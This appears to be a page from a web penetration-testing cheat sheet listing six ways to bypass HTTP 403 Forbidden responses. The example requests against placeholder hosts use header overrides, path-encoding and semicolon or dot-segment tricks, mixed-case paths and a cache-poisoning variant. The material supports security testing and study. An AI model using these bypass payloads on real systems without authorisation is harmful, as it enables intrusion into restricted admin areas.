HTTP Code 403 (Forbidden) Bypass

1) X-Original-URL header

GET /admin HTTP/1.1
Host: target.com
X-Original-URL: /admin

2) Appending %2e after the first slash

http://target.com/%2e/admin

3) Dot (.) slash (/) and semicolon (;) in the URL

http://target.com/secret/.
http://target.com/secret//
http://target.com/secret/..
http://target.com/;/secret/
http://target.com/.;/secret/
http://target.com//;//secret/

4) Add "..;/" after the directory name

http://target.com/admin..;/

5) Uppercase alphabet in the URL

http://target.com/aDmIN

6) Web Cache Poisoning

GET /anything HTTP/1.1
Host: victim.com
X-Original-URL: /admin

PreviousHTTP Attacks NextHTTP Misconfigurations

Last updated 5 months ago

hashtag1) X-Original-URL header

hashtag2) Appending %2e after the first slash

hashtag3) Dot (.) slash (/) and semicolon (;) in the URL

hashtag4) Add "..;/" after the directory name

hashtag5) Uppercase alphabet in the URL

hashtag6) Web Cache Poisoning

1) X-Original-URL header

2) Appending %2e after the first slash

3) Dot (.) slash (/) and semicolon (;) in the URL

4) Add "..;/" after the directory name

5) Uppercase alphabet in the URL

6) Web Cache Poisoning